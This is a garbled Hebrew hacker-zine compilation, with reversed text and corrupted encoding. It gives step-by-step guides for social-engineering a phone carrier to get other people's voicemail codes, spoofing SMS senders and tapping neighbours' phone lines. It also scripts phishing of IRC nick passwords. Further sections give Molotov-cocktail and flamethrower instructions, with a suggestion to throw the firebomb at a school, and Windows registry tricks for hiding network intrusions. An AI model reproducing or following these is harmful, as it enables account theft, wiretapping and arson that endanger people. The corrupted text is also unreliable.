ירלולס ןובישמל הצירפ
אל םכירבחל וא םכל הרקי רשא רבד לכ !וב שמתשהל ןיאו רמוחה דומילל אוה ןאכ בותכה לכ
בתוכה תוירחאב%
אוה דיגנ !והשלכ רפסמ םירחוב םתאh
*=3******
*=9******
*=.******
רישכמה לש יאנכט דוק #רד( ןופאלפה לש תואנכטל םיכלוה םתאY
ןטק יוניש םא שקובמה רפסמל ותוא םינשמו רפסמה לש הרושה תא םיאצומ%
היה אוה םא
*=9 ! *** ! ***
2 2 2
93=9 *** ***
*=3 ! *** ! ***
2 2 2
93=3 *** ***
*=. ! *** ! ***
2 2 2
93=. *** ***
רתוי טרופ רבסה h
93= ! םוקלס רוזא
3,=,. ! תמודיקב הנורחאה הרפסה
****** ! ליגרכ רפסמה
0 $ תוחוקל תורישל םירשקתמ זאו םתיצרש רפסמל םינשמ םתא +93
יל ספאל ילוא וא םכלצא ררבל רשפא !אמסיסה תא יתחכשו ןובישמ יל שי !םולש $םירמוא םתא
אמסיסה
שי( ונממ רבדמ התאש רפסמה המ תרמוא איה !)ישפוחו ליגר ורבד( הזכ והשמ וא ןובישמה לש
ההוזמ החיש םהלY,
אוה תרמוא איה ירוקמה רפסמה0 תא קר דוקה לש תואנכטב תבתכש רפסמה תא הנוע התא
#ות ספואי +* תוקד
X היהי דוקה +93: תוארתהל !הדות בוט $רמוא התא .) %
!!!!!!!!!!ףוס!!!!!!!!!!
i תבתכ םא 93=3****** !רוקמל ותוא ריזחמ התא *=3!****** %
וקה לש ןובישמה לש אמסיסה תא םיעדויו םירשקתמ םתא םיצור םתאש רישכמ הזיאמ זאו
םתרחבש%
ןומחתל לק רתוי הז תולאש תוחפ םילאוש יכ !ןמקוט לע ירישכמ לע ושבלתת - םיפיט%
0 הז ןקמוט לש תוחוקלה תוריש וישכע NN; %
םילוכי דימת םג םתא ןמקוט רישכמ לש רפסמ ןופאלפה לש תואנכטב םתמשר םא סונוב
0 ל רשקתהל NNN
רישכמבו וקב יולת !דבוע דימת אל הז לבא .וקה לש ינכדע ןובשח בצמ ררבלו%
+:J
By Pirsing
+:N
תועדוהה תחלישב חלושה רפסמ #ויז
םישורד םיכרצמh
& היקונ ןופאלפ רישכמ =+9*/J+9* אסריג םוקלס וקב ,%
& Xאסריג , אסריגב התוא ןיא !תועדוה תביתכ תורשפאה העיפומ טסקט תועדוה טירפתבש איה
"Y
&& Xןולחה תא ורגס אנא תובותכ תועדוה חולשל רישכמב תורשפאה תנתנ הניא םאY
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
הדובעל הללאי h
+% $אוהש )רישכמה לש יאנכט דוק #רד( ןופאלפה לש תואנכטל םיכלוה 3**+m+93:=m i
9% םא שקובמה רפסמל ותוא םינשמו רפסמה לש הרושה תא םיאצומ
תרוכזת הנה לבא םינובישמל הצירפ לע #ירדמב הז לע יתבתכ .ןטק יוניש%
אוה רפסמהh
*=9****** !!jj 93=9******
*=3****** !!jj 93=3******
*=.****** !!jj 93=.******
:% שדחמ רישכמה תא םיליעפמ !םיאצויו םירמושו הרושה תא םינשמ%
&&& הטמל םירכזנה םירפסמה דחאל וגייח אנא ןוכנ דבוע לכהש אדוול ידכ,
רדסב םתא גויח לילצ םתלבק םא%
iNNN Xדבלב ןמקוטY%
iNN; Xדבלב ןמקוטY%
i+93 Xתוחוקלה לכY%
תאו החטבאב םתבתכש רפסמה תא וקדב זא ילמרונ לילצ םתלביק אל םא !ירשפא לבא הבוח אל
םתגייחש רפסמה%
הרוק המ הארנו ליימיא יל וחלש זא אל םא לבא רישכמב איה הארנכ זא תויעב שי ןיידע םא%
#ישמנ הללאיh
=% ל וכל h
תועדוה תביתכ !טסקט תועדוה !תועדוה !טירפת%
םכל אבש המ( העדוה ובתכY%
ישיא עדיל ועדתש ידכ והשמ וישכע%
&&&& יאנכט דוקב םתבתכש הז היהי חלושה רפסמה ןעמנל עיגת העדוהה רשאכ%
ןובשחב סונימב אל )וילע ונממ רתוי( ונממ םיחלוש םתאש וקה לש בצמהש תואדוול שי ןכ ומכ%
&&&&& רתוי טושפו זכרומ תוחפ .ףידע דימת ןמקוט יתרמאש ומכ t
r!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!j
ישיא ןויסנמ !תויוטש הז לבא םכתא עיתרי תצקש והשמ דיגהל #לוה ינא וישכע t
וילע םתילעש וקה לע םינותנ תחילש-תלבק דוע עצבתת אקוודש רתויב שולק יוכיס שי,
רישכמה ימ לש וקדבי ןכ ומכ לבא םכתא ורתאי אל לבא םכילע ולעיש יוכיס שי זא
הזמ תאצל םיכרד שי דחפל אל לבא םכילא ואובי זאוh
+% ותוא יתאצמ עגרהו ןופאלפה תא יל ובנג%
9% השוע אוה המ יתעדי אל וב םייוניש הזיא יל השעו ןיבמ התוא קחיש ילש רבח הזיא%
3% ותוא יתאצמ וישכע קרו רישכמה תא יתדביא%
לש יוכיס הז לכ לבא + תעדל םיכירצ ילש םיכירדמה תא םיארוקש הלא לבא הרקי הזש ןוילימל
לכה%
r!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!j
By Pirsing
+:.
Beige Box
אוה הז רמוח !ןאכ בותכה רמוחב שומיש לכל יארחא אל ינא $תורעה
וב שמתשהל ----ןיא----ו דבלב תוידומיל תורטמלt
תובושת תולאש טסקטה תא לכ םדוק ארקיש גניקירפב ליחתמש ימ%
הז המ Beige Bo'pp
sssssssssssssssss
Beige Bo' םירחא םישנא לש ןופלט יווקל רבחתהל #ל תרשפאמה אספוק איה,
םהלש תוחישל תתוצלו !םנובשח לע רשקתהל%
אספוקה תא תונבל ידכ #ירצ ינא המp
ssssssssssssssssssssssssssssssss
ןופלטה תאספוק #רד היינשהו !ריקה #רד תורידב תחא $אספוקב שמתשהל תוטיש יתש שי
תישארה
!קזב לש למס םהילע שיש בוחרב הלאה תולודגה תואספוקה תא םיריכמ םתא( בוחרב תאצמנש
ןוכנpY%
הנושארה הטישל םירמוחh
k שיטפ
k ןופלט טוח
k םחלמ
k רבוחמ ל שדח ןופלט עקש
k סנפ
k לידב תצק
k ןופלט
k ינכט שוח תצק%%%
היינשה הטישל םירמוחh
l ןופלט
l ןופלט טוח
l חוטש שאר םע גרבמ
l סנפ
l ינכט שוח תצק%%%
תונבל דציכ
&&&&&&&&&&&
שומישה לע רבסהב רבסות הנושארה הטישה%
היינש הטישh
ןוכנ השק היה הז( .ןופלטל ותוא ורבחו !ןופלטה טוח תא וחקpY
שומיש
555555
הנושאר הטישh
םודאל קוריה טוחה ןיב ודירפהו םכלש ןופלטה טוח תא וכתחת לכ םדוק%
למשחתהל םיצור אל םתא( .למשחה תא ול ורגסו ולש תיללכה למשחה תספוק תא ואצמתY
ןותחתה קלחב !ףתושמה ריקהמ קלח ורבשתו שיטפה תא וחק #כ-רחא%
+:;
ןופלט יטוח ושפחתו !סנפ םע המינפ ולכתסה%
טוחה םע םודאה טוחה תאו !םכלש קוריה טוחה םע קוריה טוחה תא ומיחלת םתאצמש ירחא
םכלש םודאה%
לילצ םיעמוש !תרפרופשה תא ומירה .םכלש ןופלטל ינשה הצקה תא ורבחו םכלש טוחה תא וחק
גויחp
םהלש למשחה תא םינכשל וריזחת זא ןכ םא%
Xםילבכו למשח בונגל ידכ םג םילק םייונישב דובעל הלוכי הז הטישY
היינש הטישh
קזב לש ןופלט תאספוקה לא וכל%
גרבמה תרזעב )חתפמ #ירצ היהי יכ ודבעי אל םקלח( התוא וחתפ%
ןופלטה יעקשמ דחאל ןופלטה רוביח תא ורבח%
וירחא אבל ורבחת זא אל םא !הזה רוביחב וראשיה גויח לילצ םיעמוש םתא םא%
הז ליבשב םלוס #ירצ ללכ #רדב #א !דבלב דדוב תיב לש רוביחב םג דובעת הזה הטישה%
יתרבחתהש ירחא תושעל המp
iiiiiiiiiiiiiiiiiiiiiiii
רפסמל רשקתת לכ םדוק "N, לארשיב אוהש ++* וילא םתרבחתהש ימ לש רפסמה המ ולגתו %
םילוכי םתא שומישב אל וקה םע #א !ןיזאהלו ראשיהל םילוכי םתא הזה וקב רבדמ והשימ םע
םיצור םתאש רפסמ לכל רשקתהל Xxxx3e'Y%
תורטמל אוה הז רמוח !ןאכ בותכה רמוחב שומיש לכל יארחא אל ינא0 $םויסל תונטק תורעה
וב שמתשהל ----ןיא----ו דבלב תוידומילt
i לבא תרחא בותכל לוכי ייתיה !םלוכל ןווכמ #א רכז ןושלב אוה ןאכ בותכה לכ
תוירקירפ לארשיב ללכב ןיאש יל הארנ%
By AiTi
+=*
Mirc ב םירדח תצירפ
רדחל !ורפילו םיידיה תא ךלכלל יל המל ....???
X%מאמה תא הווש אל הז וצרפית לא ...הוושש תרחא וא ...תאזה הביסה תא םכל ןיא םא%%%Y
...עדוי אלש ללגב םכתוא קרוז ..הזה פואהו ..לודג רדחב פוא הזיא שיש ..דיגנ ..וארית &ת
יכה הביסה תאז( ....םכתוא קרוז אוה זא דיגנ ....בהוא אוהש ןומיקופה לע והשמ םתרמא
תוברעתיהו הז ...םירדחל %ורפל תצלמומ%%%Y
ול ריזחהל םיצור םתאו םכתוא קרוז אוה ןפוא לכב זא%%
ריזחמ ינא #יא זא ...ונ &שptpt
ירחא ..תוינש המכל לופיו ילואש הזכ לבא ...רברס אוצמל #ירצ ....ןושאר רבד ..טסקטה הז &ת
ומשרית ..פוא םיגישמו רדחה תא םש םיחתופ םתא )"""אוצמיל השק ארונ( הזכ דחא םתאצמש
רדנואפ לש דמעמ ןתונ הז רדחה תא םש%%%%
לופי תרשהש ...ןפוא לכב%% X3IlitY רוזחי אוהש תרשל רוזחל ולכות םתא%%%
ןכ ןכ ןכ """פוא םש םכל היהי .המ ושחנו ...רדחה לש תרשל רבחתיהל זאוttt
By ^DaK0Da^
+=+
Mirc ב םיקינ תצירפ
דיגי ינא ...םיכרד המכ שי 3 םייוסמ עונכיש רשוכ םישרוד םתשולשו %%%,
קינל תוהדזיהל ול ודיגת םאש הזכ ....ראיירפ שממ לבא ...ראיירפ דחא הזיא םיכירצ קר םתא
בוט הז תא השעי אוה םכלש שדחה טובה לצא%%%
6o6o6o6o6o66o666oooooooo66oooo6o666666ooo666oo666oo6666o
דבוע הזש חוטב אל'נא( -א #רד%%%Y
הככ תכלל רומא הזh
rLouj Lo, -uck Man%%%
rk-uck!Manj p
r)ouj Il(%%% chak ,t 6ut%%% alts*9JJ 6n Lour Nu4ber Iad%%%
rk-uck!Manj -ine%%%
rk-uck!M"Nj n+9snQokk
r)ouj nice Iassword ass holettt
666ooo666666oo666oo6666oooo666ooo6666oooo66666ooo666ooo
םיניבמש ולאכ לע דובעי אל( -ב #רד%%%Y
עדויש ימל קר( טפירקסל אמגוד בותכיל%%%Y
תיטמוטואה תוהדזיהה תא קודבל ול דיגהלו ןברוקל חולשיל%%% Xauto!identiQ)Y
#כ תוארהל הכירצ הדדוקפה%%%
"uto!,denth/4sg Me4o3erV send r)our nickj xxpnuIassword to auto!identiQ)pu
ליבד תויהל בייח אוה( ...פאפופ אב הז תא םישל ןברוקל ודיגת%%%Y
666ooo66666oo6666ooo666ooo66666oo6666oooo6666oo6666ooo
דובעי הזש ידכ ראיירפ דלי תויהל #ירצ שממ הז ...דחא דוע%%%h
r2[Lou]2j )* (ero33
r(ero33j Leahp
r2[Lou]2j Hereos the new bot% ,o4 setting uI accounts now% he 8ill Bild " serVer -or
Lou%
Msg it this!
addsIrotected user r)our nickj r)our nickos Iasswordj
r(ero33j ok
הרעה h
םתא םא ..םכל ונימאי אל ..זא יכ ...דחא דירוהל אלו טוב תונבל ידכ ...גניטפירקסב םיניבמל
זא םידירומ
לש הלאהמ דחא ודירות www%4irc'%co4
ההזי אל דחא ףאש ידכ עצמאהמ דחא ורחבית%%%
By ^DaK0Da^
+=9
הרעבת קובקב
Xשיש הבוט יכהו הטושפ יכה הטישה תאז טושפ יכה%%%Yh
םירמוח h
ינפל תותשל המ היהיש ידכ הריב לש %למומ( ...תיכוכז קובקב -א%%Y
הטושפ ריינ תיפמ -ב%%%
לוהוכלא לש קובקב -ג%%%
תוזירז -ד%%%
עוציבה ןפוא h
קובקבה תא וקנת לאו הריבה לכ תא ותשttt%%%
בוט יכה ..יצחה דע רשפא( םינפב לוהוכלא הברה הברה הברה ומיש הז ירחא%%%Y
%וחב היהי תיפמהמ קלחש( ...ריינ תיפמו%%%Y
רורפגה תא וקרזו ...תיפמה לש הצקה תא ופרש%%%
קובקבה #ותל%
הפיה קלחה %%%
רהמ שממ קובקבה תא וקרז וישכע%%
ורקי ילוא םירבד ייתשוh
+! םוחהמ םיסיסר הברה הברהל ריוואב %ופתי אוה%%%
9! אוב עגי אוהש רבד לכ ףורשי אוה%%%
ס הז הרקמ לכב 99 םכלש ידוסיה רפס תיבה #ותב הז תא קורזל ה %%
םכלש יחכונה רפס תיבב וא%%%
היריעה ןיינב דיל םתס וא%%
ונהתש םכילע #מוס ינא ןפוא לכב%%%
By ZeBrA
+=3
Flame Machine רויבל תונבל ךיא
~The girl is mine¨ - Micheal 1ackson
בוט לכה ילצא . םכמולש המ %%%
בוש תודוקנ המכ ריהבהל ידכ טסקטה תא יתבתכ !תרכומו הנשי איה הטישה %%%
םירמוח h
+% םיבוט יכה םה םיפיוזמה - תואמצעה םויב ומכ ( יירפס Y %
9% םיילמשח םירונת ויהש ינפל םעפש תיקנעה תיצמה תא ףידע לבא הנטק רשפא ( תיצמ
- ילע אב החטבאהו רפוסב הז םע יתקחיש םעפ ( פוא-וקב גישהל רשפא - חבטמב ושמתשה
ליפורפ דירוהלY%
3% רעשה םכלש הרבחל ףרשנ םא ירחא אל ינא - %מוא Xh %
#ומנ %חלב יירפס םע תדבוע - א הטיש %%%
- ... שא ... ףורש ... םח תויהל ליחתמ לכהו תיצמה תא תונידעב ברקל יירפס %ירפשהל ליחתהל
בבושה ןדאל-ןב תא וליפאו רטוש !אשד ףורשל רשפא הז רויבל םע -רויבל םכל שי הז עגרב רמולכ%
דימת תדבוע - ב הטיש
ריוואל תוריהזה אישב תיצמה תא ברקל !ריווא %ירפשי קובקבהש גואדלו קובקבה תא םייסל
הזה ריוואהש םיבשוחו םיעוט םישנאש םושמ תאז הטישב ארונ רהזהל שי .רויבל םכל שי הניהו
וארתו וסנת ... לבא הלודג הבהלל איבי אל Xh %
הפצרה לע אוהשכ יירפסה לש ןבלה םע תושעל המ p
ףוסב( ... קילדהלו יירפס לש #ורא וק תושעל %ילממ ינא . ארונ קילד אוה !ותוא קילדהל רשפא
פ חור בצמ םכל היהי זאו $( קוהמוט ליט הזיא וא ... םיצפנ המכ חינהל רשפא וקה 33 תו Y %
By Razor \ Old-Hacker
+=:
Windows Tricks Part 1
' תללוהמה הלעפה תכרעמב םירבד אלמ תונשל לכות דציכ #ל רפסי הזה #ירדמה W,n3ows
םירבדל עגונב םינוש םיקירטו םיפיט םג ןכ ומכו !)תכרעמה םושיר( ירטסי'גרה #רוע תועצמאב
)...בזל הווש יתעדלש( תאזה הלעפהה תכרעמב שמתשמ התאש העשב #ל רוזעל םילוכיש
תמסיס חוציפל הנווכה ןיא אל( W5NDOWS )...#כב קסוע #ירדמהש הרקמב תבשח םא
בותכל יתינהנ ינאש ומכ ונממ הנהתש הווקמ ינאו הזה #ירדמה תביתכב תועש הברה יתעקשה
ינא םימדקתמ םישמתשמל קלחו דואמ םיליחתמ םישמתשמל ובתכנ הפ םירבדהמ קלח .ותוא
.בורה תא ונממ וקיפתש הווקמ
עדימ םגו תונורחאה םינשה #שמב #כל עגונב םינוש םירתאמ יתפסאש רמוחמ בתכנ #ירדמה
.הפ תיאר רבכש םירחא םירתאב םירבד הארת םא עתפות לא ןכל ילש ישיא
תמגודל( תונכת תופשב תנכתמש ימ לכל >% #רד הפ תועצומה תוטישהמ קלח ליעפהל הסניש ! )
ילוא עדוי ימ !טלחהב דמחנ לוגרת תויהל לוכי הז . ירטסי'גרה תא ליעפתש תמיוסמ תינכות
...תאזכ תינכות ןיכי ינא והשיתמ
אוה !תיקוח יתלב תוליעפל םורגל וא ) ו הלעפהה תכרעמב תושק עוגפל לוכי הז #ירדמ $הרהזא
דבלב תיטרפה #תוירחא לע הז וב שמתשהל ןווכתמ התא םא ןכלו דבלב תוידומיל תורטמל בתכנ
""יקוח אל וא יקוח אוהש ןפוא לכב הז #ירדמב שומישב השעתש רבד לכל תוירחא חקול אל ינא
$שרדנ עדי
( #לש ירטסי'גרה #רועב תצק שמתשהל עדתש ףידע- RE"ED5#.EXE תייקית תחת אצמנש )
W5N*( וא W5NDOWS בותכתו 7& הלעפה 7 & לחתה לע %חלת םא הלעפהל ןתינו
RE"ED5# רבד ! וב םג שמתשהל דמלת זא -בשחמה לש רייסה תא הריכזמ יד ולש הלעפהה !
התא המ #רעב ןיבתש ליבשב קר תונכתב יללכ עדי #ל היהיש יאדכ םג ןכ ומכו .טלחהב טושפ
.השוע
תכרעמל בתכנ עדימה לכ w,n3ows *(:*! "תילגנאה הסרגל םג םיאתמ אוה #א תירבעב
"ותומדקל בצמה תא בישהל לכותש ידכ השוע התאש יוניש לכ רוכזל ) תובגל רוכז
ררולפסקא נרניאב רבכעה לש ינמיה רותפכה
לש ינמיה רותפכה לע %וחלל #ל םינתונ אלש תויצרק םינבצעמ םירתא שיש אנוש אל התא ! דיגת
.ןבצעתת לא ןכבו !טפירקס תועצמאב רבכעה
לע %חלו ינמיה ןצחלה לע %וחלל הצור התא ובש םוקמב דומע טושפ הזכ רתאל עיגמ התא םא
רותפכל תחתמש רותפכה S,ft .דבוע ינמיה ןצחלה ! יפוי הזיא .)רבכעה לש רויצה םע הז ןכ(
הציחל תועצמאב טפירקסה לע תולעתהל םילוכי טושפ יעצמא ןצחל לעב רבכע םע םישמתשמ
.ינמיה ןצחלה לע הציחל ןכמ רחאלו יעצמאה ןצחלה לע הפוצר
תועצמאב רתאב הווא'גהמ טושפ םלעתהל רשפאש ןבומכ 5N#ENE# EXPLORER יע
תישיא תמאתומ המר . החבא . נרניא תויורשפא . םילכ
טפירקס םושש #כ םש הנשו JA>E וא JA>A SCR5P# ...דואמ טושפ !לעפי
ה לש תימווא הלעפה תקספה CD
הש ןוכנ CD ROM .הז תא קיספהל הצור . תיטמוטוא םיצבק ליעפמ #לש
$האבה הייקיתל סנכהו #לש ירטסי'גרה #רועל שג ןכבו
HKEY_CURRECT_USER\Sofware\Microsoft\Windows\CurrectVersion\Poli
cies\Explorer
ב אצמנש #רעה תא הנש 'oD"%5e6y,eA*$oR*. : ל
BD 00 00 00
+==
ידכ שדחמ בשחמה תא ליעפהל ףרטצתש הארנכ( תיטמוטוא הרוצב לעפי אל קסידה וישכע
היה ונממ תינישש עדימה תוכרעמה בורב יוביגה #רוצל כד . )שחרתי יונישהש
95 00 00 00
יצבק לש תרעזוממ הגוצת תריצי BB3
ש ןוכנ . דחוימב קיזמ אלו דמחנ קירט הנה 5CONS הז האור התאש המ ' םהש ומכ האור התא
יצבקל תושעל רשפא םג #כ זא ! ןוקייאה %MP . #יא '
$ל סנכהו ירטסי'גרה #רועל #ל
HKEY_CURRECT_ROOT\PAINT.PICTURE\DefaultIcon
תיוות ב אצמנש #רעה תא הנשו De84*&$ ל K1
.דחוימב דמחנ קירט הזש בשוח ינא תישיא
וברו יירפת
םילע םיטירפתה ...דיגנ תוינכות לע וישכעו לחתה לע %חלת !בהאתש חוטב ינא הז תא
$ וברוט תוריהמל םתוא #ופהת אוב ' תנבצעמו תיטיא תוריהמב
$ל סנכהו ירטסי'גרה #רועל סנכה
HKEY_CURRECT_USER\CONTROL PANEL\ DESKTOP
#ותב DESK6O3 חתפמ ןכה S$"%.0 L4&*e ינמיה ןולחה #ותב ינמי שקמ לע הציחל יע( שדח
תריחבו S$"%.0 L4&*e ) " #רעה אל( ולש םשב בותכו ' ) Be.*S-o!De&4y
#רעה תא םיש וכותב 10 בשחמהש היינשה תוינוילימ רפסמל הווש #רע לכ( הזמ #ומנ #רע וא
בשחמה תא לחתה ..תרציש תיוותה לע הלופכ הציחל יע )אבה טירפתה תא חתפי אוהש דע הכחי
...#ל סוטי אוה טירפתל סנכתש האבה םעפבו
ןולחב תרתוכה יוניש I.$e".e$ Ex,&o"e"
ןפדפדה תא ליעפת םא Ex8/orer תרתוכב בותכש הארת M,.rosoft 5nternet Ex8/orer ןתינ
$ #כ יע תאז תונשל
$ הייקיתב ירטסי'גר #רועל סנכה
HKE)MLOCALMBACHI'ENSOF6ARENB%9"oso8$NI.$e".e$ Ex,&o"e"NB4%.
חתפ S#R5N" >AL=E םשב ול ארקו שדח !%./o! $%$&e התא ותוא טסקטה תא םיש וכותב
.עיפויש הצור
)םימדקתמל( ולש ןוקייאהו $לחתה$ רותפכ תא תונשל
הזה #ירדמה יכ תצק דמלת זא םיילמיצדסקה םיסיסבב עדי #ל ןיא םא ! םיליחתמל #בוסמ יד הז
. )ילש םיכירדמב אוצמל ןתינ( הזכ עדי שרוד
לש רותפכה תא תונשלש בשוח ינא St2rt $ליחתנ אוב הללאי .דמחנ דואמ רבד הז
:בותיכה תא תונשל
תא הבג EO3LORER.EOE תייקיתמ I'DOS
#רד אוצמל עדת התואש( תמיוסמ הייקיתב ותוא תיביגש רחאל DOS סח #ל #לי אוה םא
תבותכל #ל .אוהשלכ ילמיצדסקה #רוע תועצמאב הרוצה תא ול חתפ )הלילחו HEX
02DF0E
$הז תא הארת םש 53 00 74 00 61 0 72 00 74
רמוא הזש S"4"$ )יקסאל םוגרת( ה תרפס לכו 00 יטרואית חוור( תויתואה ןיב חוור םינייצמ
...הצור התאש תויתוא הזיאל םיכרעה תא הנש . )"תויתואה ןיב חוור ןיא הלעפהה תכרעמב
ה תרמהל םאתהב( ASC55 .ילמיצדסקה סיסבל
...תירבעב הז ךיא גשומ יל ןיא ( תילגנא תכרעמב דבוע
:ןוקייאה תא תונשל
תא הבג 1SER.EOE תייקיתמ I'DOS
אורקל לוכיש והשלכ םינוקייא #רועל #ל וישכע EXE המל ותוא הנש ! %בוקה תא וב חתפו
.הצרתש בושח והשמ ...תצק הז םע קחשל הסנת ' #סמה לדוגל םיאתהל #ירצ ןוקייאה לדוג
+=J
$הרסה , הפסוה$ מ תוינכות ימוקימ #יעהל
השוע התא =N5NS#ALL ומכ הז תא תישע אלו טסיטוא התאש הארנכ לבא הנכות ) קחשמל
#ירצש ): ( #כ לע המקנכ חחח ) W5NDOWS #ותב הרקבה חולב הז לש תיוותה תא #ל העקת
...היעב ןיא . הז תא ףיעהל הצור . הרסה )הפסוה
$ל #ל
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersi
on\Uninstall
.יוצר אל םוקימ לכ קחמו
$לא חלש$ ירפת
טירפת #ל שי והשלכ םוקמב ינמיה ןצחלה לע %חול התאש ןוכנ ...רבד םוש שדחמ אל ינא בוט
תילגנאב וא לא חלש ארקנש Sen3#o ...
הייקיתל #ל אבש המל םינפבש תומוקמה תא תונשל ליבשב Se./6o תכרעמה תיירפסב
W5NDOWS ' הצור התאש המ תא הנשו תרתסומ םג תויהל הלוכי הייקיתה
$רוזחמה לס$ םש יוניש
...הצור התאש המו ילש חא ! לבז חפ ' #ל אבש #יא רוזחמה לסל אורקל הצור
$ל ירטסי'גרב #ל
HKEY_CLASSES_ROOT\CLSID\¦645FF040-5081-101B-9F08-
00AA002F954E /
ב עיפומש םשה תא הנשו De84*&$
בשחמה לש הריגס , החיתפ יכסמ
...הלחתהה לש הקיפרגה תא םימעפל תסרוה איה יכ תאזה תוטשה םע רהזת בוט
תייקיתב W5NDOWS המל םתוא תונשלו רייצ םע חותפל לוכי התאש םיצבק םנשי #לש
...הצור התאש !ינפל תובגל חכשת לא )םירתסומ םג תויהל םילוכי םיצבקה(
/o?o.s@s בשחמה לש החיתפה #סמ '
Lo?os.s@s בשחמה תא תובכל חוטב תעכ #סמ '
Lo?ow.s@s בשחמה לש יוביכה #סמ '
םיימוקמ םיירפתל םיקתוע רוצ
". רמגנ רבכ המ (...הז #ירדמל םיפיטה תא רגוס ינא הזבו תעדל #ירצ שמתשמ לכש ! רידא רבד
).....וווווא ... דמחנ הזכ היה לבא
$#כ הל ארקו השדח הייקית רוצ
Control Panel.¦21EC2020-3AEA-1069-A2DD-08002B30309D]
התאש המ התא השע... הרקבה חול ומכ קוידב תיארנ איה ...ןאכ האור ינא המ " הפוה הפוה
...תעכ הצור
$ תמגודכ םירחא םירבדל םג תושעל ןתינ רבד ותוא
: תשרל גויח
D%4& 1, 'e$.I992CFFA0?F557?101A?88EC?00DD010CCC48J
תוספדמ2
Printers.¦2227A280-3AEA-1069-A2DE-08002B30309D]
:םוכיס
.הב #לש שומישה תא לעייל םילוכיש הלעפהה תכרעמל םידמחנ םיקירט המכ תדמל הז #ירדמב
)$ םימעפ המכ תכרעמה תא #מצעל תסרה םיקירטב שמתשהל #יא עדוי אל התא םאש ןבומכ
תינהנש הווקמ
Zeos
+=N
Windows Tricks Part 2
םירבח לע %ירהל סודניוב תויוטש םע #ירדמ הז יכ !הז תא םיארוק םתאש חמש ינא ממה,
בלב הסאב םהל תושעל ףיכש הלאכו !םירמייל !םכתא םינבצעמ םהש%
+% הלב הלבו תושקב ילב !ריהמ יוביכ%
בשחמה תא הבכמש הדוקפ טושפ%
&h<windows<rundll%e'e user%e'e,e'itwindowse'ec
9% הלחתה טירפתמ יוביכה תורשפא תא לטבל%
H/LP&MRRN#PM3R<3oQtware<MicrosoQt<8indows<&urrent0ersion<Policies<'
Ilorer
םישפחמ
No&lose /e)
ורצית אצמנ אל אוה םא
יע
New j 3tring 0alue%XNa4e it No&lose/e)Y
#רע ול ומיש !וישכע + #רע רשאכ . + תלטובמ יוביכ תורשפאה אוה זא ליעפ %
רהמ רתוי הז תא תושעל םיצור p
RGתמויס םע שדח %בוק וחתיפ
ss
RG$,#:
[H/LP&MRRN#PM3R<3oQtware<MicrosoQt<8indows<&urrent0ersion<Policies<
'Ilorer]
uNo&loseunu+{
ss
ןבומכ ותוא וליעפהו%
3% םינכסמ םיטייב וליק המכ #וסחל ידכ סודניוה לש םיפיטה תא קוחמל%
H/LP76&"7PM"&H,N<3oQtware<MicrosoQt<8indows<&urrent0ersion<'Ilorer<
#iIs
הקיחמ שקמ יע םתוא וקחמו םיפיטה תא ורחב טושפ%
:% לחתה טירפתב םימיוסמ םיטירפת קוחמל
Run המגודל
ל םיכלוה
Regedit
H/LP&MRRN#PM3R<3oQtware<MicrosoQt<8indows<&urrent0ersion<Policies<'
Ilorer
New j $word
Na4e j N6RMN 0alue j +
N6-,N$ןכ ומכ
תדלקמה לש םישקמה #רד םשל עיגהל #רדה רוציק םג #לה%
+=.
#רע םתישעש שדחה רבדל םימש !םישוע המ בצמל ריזחהל ידכ * ותוא םיקחומ וא %
=% X ט.נ סודניוב תשרל ןורחאה רבחתמה לש הגצהה לוטיב .)םירקאה ליבשב = %
H/LP76&"7PM"&H,N<3oQtware<MicrosoQt<8indowsN#<&urrent0ersion<8inlo
gon
Na4e j ReIortBook6/ 0alue j +
#רע םימש וא ותוא םיקחומ לטבל ידכ * %
!! תשרב בוט אל והשמ םתישעו םינורחא םתרבחתה םתא םא עדי אל ןימדאהש ידכ בוט הז%
% .ט.נ לש תושדחה תוארסיגב דבוע הזש חוטב אל ינא ממה J וסנת לבא %
ט.נ סודניוה תלעפהב אמסיס תקידב #סמ לוטיב% %
Reg %בוק םיחצופ
$,3"B7%reg
!!!!
RG$,#:
[H/LP76&"7PM"&H,N<36-#8"R<MicrosoQt<8indows<&urrent0ersion<Poli
cies<Network]
u$isablePwd&achingundwordh*******+
!!!!
By Zeos
Razor - םינוקית
+=;
WAP - Wireless Application Protocol.
הז #ירדמב המ p
i והמ 8"P p
i ה לוקוטורפ לע םינופאלפה תמישר ! 8"P tt
i הז תא לצנל רשפא #יא ppt
i ספתיהל אל רהזיהל #יא tt
i אשונל םירושק םיגשומ tt
i םיטידרק tt
והמ 8"P p
nnnnnnnnn
לש תוביתה ישאר 8"P אוה ! 8ireless "IIlication Protocol%
יגולנא אלו ילטיגיד וק ומכ עדימ ןופאלפ ירישכמל ןתונ רשא תרושקת לוקוטורפ םצעב אוה%
& וישכע היגולונכטהש ומכ תמכחותמ אל רשא הטושפ תשר איה תיגולנא תשר
&& םיירשפא םימושי רתוי הברה הב שיו תמדקתמ רתוי הברה תילטיגיד תשר%
ה!8"P יהשלכ ןופאלפ תשר לש םילנימרט םגו םיליגר ןופאלפ רישכמ שמשמ%
&&& םיירשפא טנרטניא ימושיל שמשמ םג אוה%
ה תא םיללוכ רשא םירישכמה לכ! 8"P הזכ וגול םהילע תויהל רומא ! MMM%
MMM ! Mobile Media Mode% לנה לוקוטורפב לעופ ולש רישכמהש חוקלה תא עדימו%
ה לוקוטורפ לע םינופאלפה תמישר ! 8"P t
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
לע םידבוע רשא םירישכמ לש המישר הנה 8"P h
"lcatel 6ne#ouch
BeneQon g 8"PsH#M7
BeneQon #win $ual 3,M
ricsson R39*
ricsson R3.*
Mitsubishi #riu4 Geo 8"P
Motorola #i4eIort 7N3.;
Motorola V99..
Motorola #alkabout X#99..Y
Nokia J9+*
Nokia J9=*
Nokia N++*
Panasonic G$ ;3
3ie4ens 33=i
3ie4ens M3=i
3ie4ens &3=i
3on) &M$!1=
